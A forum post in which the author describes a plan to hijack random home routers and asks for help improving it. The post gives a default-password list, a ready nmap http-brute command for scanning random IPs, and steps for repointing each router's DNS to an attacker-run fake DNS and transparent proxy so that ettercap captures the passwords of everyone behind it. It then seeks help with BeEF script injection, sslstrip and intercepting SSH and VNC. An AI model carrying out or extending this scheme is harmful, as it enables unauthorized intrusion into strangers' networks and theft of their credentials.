It seems to me that the method I'm trying to use is quite innovative, so Google won't help me with my problems.
Here is my proposed s(r1p7k1dd13'5 ultimate grail, that is better than SET:
1. Create a file with some common router passwords (admin/admin, admin/12345, admin/zyxel, etc.) and name it routers.pass. There are thousands of routers which allow access to the control panel with the default password!
2. Start a fake DNS on your host. It should resolve any domain to your IP.
3. Start squid on port 80 in transparent mode. It should allow access to anyone and to anywhere (aka public proxy). It should basically take the Host address from any request and send it for the client (so a request to should display without any need to alter browser settings).
4. Run: nmap -n -p 80 --open -T5 -iR 1000 -Pn --script http-brute --script-args brute.credfile=routers.pass,http-brute.path=/ You'll get one or two routers with default passes in a random 1000 IPs.
5. Go to the LAN settings and change the router's primary DNS to your_IP. Restart the router.
6. Anyone behind the router will access the web through your proxy, because any domain will resolve to your IP.
7. ???
While running ettercap will capture all of the passwords for the websites, I'm trying to solve the following problems:
1. ettercap won't modify any content (e.g. replace <title> with <title><script src="beef_hooker.js">). It just keeps telling me that the content is modified, but in reality the client gets untouched squid output.
2. I haven't managed to add sslstrip functionality to squid.
3. Interception of protocols other than HTTP (e.g. SSH, VNC, etc.) - it is obviously possible - but what software should be used (are there any existing programs that may help)?
Any ideas or suggestions on this method would be very welcome, as it seems like something new to play with :)